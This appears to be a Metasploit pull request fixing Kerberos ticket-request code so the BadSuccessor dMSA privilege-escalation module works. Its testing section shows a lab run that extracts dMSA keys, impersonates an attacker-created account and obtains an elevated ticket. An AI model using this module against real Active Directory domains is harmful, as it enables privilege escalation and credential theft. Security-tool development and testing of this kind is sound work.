### PR TITLE
Fixes the base service authenticator for BadSuccessor

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -430,7 +430,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   def s4u2self(credential, options = {})
     realm = self.realm.upcase
     sname = options.fetch(:sname)
-    impersonate_type = options.fetch(:impersonate_Type, 'none')
+    impersonate_type = options.fetch(:impersonate_type, 'none')
     client_name = username
 
     now = kerberos_time
@@ -743,9 +743,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       body: build_tgs_request_body(**tgs_body_options)
     }
 
-    tgs_options[:nonce] = tgs_options[:nonce] if options[:nonce].present?
-    tgs_options[:impersonate] = tgs_options[:impersonate] if options[:impersonate].present?
-    tgs_options[:impersonate_type] = tgs_options[:impersonate_type] if options[:impersonate_type].present?
+    tgs_options[:nonce] = options[:nonce] if options[:nonce].present?
+    tgs_options[:impersonate] = options[:impersonate] if options[:impersonate].present?
+    tgs_options[:impersonate_type] = options[:impersonate_type] if options[:impersonate_type].present?
 
     if options[:pa_data].present?
       pa_data = options[:pa_data].is_a?(::Enumerable) ? options[:pa_data] : [options[:pa_data]]


### PR DESCRIPTION
This fixes some some incorrect assignment statement that was causing the dMSA kerberos authentication to fail. 

# Testing
GET_TICKET action in the bad_successor module:
```
msf auxiliary(admin/ldap/bad_successor) > run 
[*] Running module against 172.16.199.209
[*] Loading admin/kerberos/get_ticket
[+] 172.16.199.209:88 - Received a valid TGT-Response
[*] 172.16.199.209:389 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260120091659_default_172.16.199.209_mit.kerberos.cca_263637.bin
[+] Obtained TGT for the user msfuser
[*] Using cached credential for krbtgt/MSF.LOCAL@MSF.LOCAL msfuser@MSF.LOCAL
[*] 172.16.199.209:88 - Getting TGS impersonating attacker_dmsa$@msf.local (SPN: krbtgt/msf.local)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260120091659_default_172.16.199.209_mit.kerberos.cca_249277.bin
[*] dMSA Key Package:
[*]   Current Keys:
[+]     Type: aes256-cts-hmac-sha1-96, Key: 516c7512ff1280e570ef772b24f7ee6200be41d37daba7d203882d44f1f6ddb5
[+]     Type: aes128-cts-hmac-sha1-96, Key: c354b4537149b34ecf3b93e3997b60b9
[+]     Type: rc4-hmac, Key: 51663edbfd718de8bdcaebd0bc06a68a
[*]   Previous Keys:
[+]     Type: rc4-hmac, Key: 4fd408d8f8ecb20d4b0768a0ac44b71f
[+] Obtained TGT for dMSA attacker_dmsa
[*] Using cached credential for krbtgt/MSF.LOCAL@MSF.LOCAL attacker_dmsa$@msf.local
[*] 172.16.199.209:88 - Getting TGS for attacker_dmsa$@msf.local (SPN: cifs/dc4.msf.local)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20260120091659_default_172.16.199.209_mit.kerberos.cca_524262.bin
[+] 172.16.199.209:88 - Received a valid delegation TGS-Response
[+] Obtained elevated TGT for attacker_dmsa
[*] Auxiliary module execution completed
```
ASCS cucumber Tests:
ESC1 was flakey, failed the first attempt but passed the second. 
```
➜  ui git:(master) ✗ bundle exec cucumber features/adcs.feature

<redacted>

11 scenarios (1 flaky, 10 passed)
386 steps (1 failed, 385 passed)
14m56.150s
```